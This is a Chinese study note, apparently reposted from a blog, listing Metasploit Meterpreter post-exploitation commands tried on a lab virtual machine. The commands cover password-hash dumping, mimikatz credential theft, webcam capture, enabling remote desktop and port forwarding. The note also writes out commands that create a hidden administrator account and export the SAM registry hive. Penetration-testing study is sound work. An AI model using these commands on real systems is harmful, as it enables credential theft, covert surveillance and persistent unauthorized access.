Meterpreter(后渗透命令)笔记

Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。

Meterpreter命令详情

下面是一些常用的后渗透命令及实验。

Meterpreter(后渗透命令)笔记_第1张图片

基本命令:

基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。

  1. background命令
    如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。
    在这里插入图片描述
  2. sessions命令
    查看已经获取的会话,如果如果想与其交互使用session –i ID
    Meterpreter(后渗透命令)笔记_第2张图片
  3. quit命令
    quit命令直接关闭当前Meterpreter会话,返回MSF终端。
  4. shell命令
    shell命令可以直接获取系统控制台shell,如果目标系统上命令可以执行程序不存在或禁止访问,那么shell命令会出错。
    Meterpreter(后渗透命令)笔记_第3张图片
  5. irb命令
    这个可以跟ruby语言交互(我没学过,暂时不会用)
    Meterpreter(后渗透命令)笔记_第4张图片
  6. run getgui -e
    开启靶机3389端口
    win下 mstsc
    Meterpreter(后渗透命令)笔记_第5张图片
  7. run hashdump
    枚举账户的hash散列值

Meterpreter(后渗透命令)笔记_第6张图片

后渗透模块命令:

在这里插入图片描述

  1. mimikatz模块
    wdigest命令获取账户名账户密码
    Meterpreter(后渗透命令)笔记_第7张图片

  2. msv抓取密码MD5
    10.Meterpreter(后渗透命令)笔记_第8张图片 这里需要购买(没必要。。)

  3. webcam_list 查看靶机是否有摄像头

  4. webcam_snap 打开靶机摄像头拍一张照片

  5. webcam_stream 打开视频
    Meterpreter(后渗透命令)笔记_第9张图片
    (我这里是虚拟机就不试了。。)

  6. screenshot 当前桌面截图
    在这里插入图片描述Meterpreter(后渗透命令)笔记_第10张图片

系统命令:

  1. cat命令
    查看目标系统上的文件内容
    (但是需要绝对路径,不能使用通配符)
    在这里插入图片描述

  2. getwd命令
    Getwd命令可以获取目标机上的工作目录,相似命令有getlwd。
    Meterpreter(后渗透命令)笔记_第11张图片

  3. upload命令
    Meterpreter的upload命令可以上传文件或者文件夹到目标机器上。
    (这里跟的路径应该是c盘的web服务器目录下,然后就可以用御剑之类的连了,我这里靶机没有装web服务器所以。。)
    Meterpreter(后渗透命令)笔记_第12张图片Meterpreter(后渗透命令)笔记_第13张图片

  4. download命令
    download命令从目标机上下载文件或者文件夹,主语斜线与反斜线。
    (后面可以接下载到的路径,不能用通配符。)
    Meterpreter(后渗透命令)笔记_第14张图片

  5. edit命令
    使用edit命令可以调用vi编辑器,修改目标机器上的文件。
    在这里插入图片描述
    Meterpreter(后渗透命令)笔记_第15张图片

  6. Search命令
    搜索目标机器上的文件。
    (可以使用通配符)
    Meterpreter(后渗透命令)笔记_第16张图片

网络命令:

  1. ifconfig命令
    获取目标机器的网络信息。
    (因为是在后渗透界面中,所以不是ipconfig,如果在shell界面中,就是ipconfig了)
    Meterpreter(后渗透命令)笔记_第17张图片
  2. portfwd命令
    这个命令类似端口映射,重要端口会有访问限制时可以将端口连接到其他端口。
    在这里插入图片描述在这里插入图片描述
    上面这条命令指将3389这个端口转发到1234端口上,用rdesktop就可以链接了。

Meterpreter(后渗透命令)笔记_第18张图片

  1. route命令
    route命令用于显示目标主机的路由信息。
    Meterpreter(后渗透命令)笔记_第19张图片

系统命令:

创建一个隐藏用户
Net user hackup$ 123 /add
Net localgroup administrators hackup$ /add
reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users c:\1.reg 【导出注册表】

  1. ps命令类似命令netstat

查看靶机上的进程信息。
Meterpreter(后渗透命令)笔记_第20张图片Meterpreter(后渗透命令)笔记_第21张图片

  • migrate命令
    将会话移植到另一个比较重要的进程内存中,这样就不会应为进程被杀死而断连。
    (这个就是我们meterpreter连接到靶机的进程及端口,这种很容易被杀掉或断掉)
    在这里插入图片描述

一般可以移植到这些进程上(它们比较重要一般不会被杀掉)
在这里插入图片描述

在这里插入图片描述
Meterpreter(后渗透命令)笔记_第22张图片

  • getpid命令
    获取当前会话pid。
    (因为刚刚把进程移植到了2104上了,所以这里是2104)
    Meterpreter(后渗透命令)笔记_第23张图片

  • sysinfo命令
    用于查看目标系统信息。
    Meterpreter(后渗透命令)笔记_第24张图片

  1. shutdown命令
    关闭目标机器。

当然后渗透命令远不止这些可以自己研究研究

你可能感兴趣的:(渗透测试常用工具)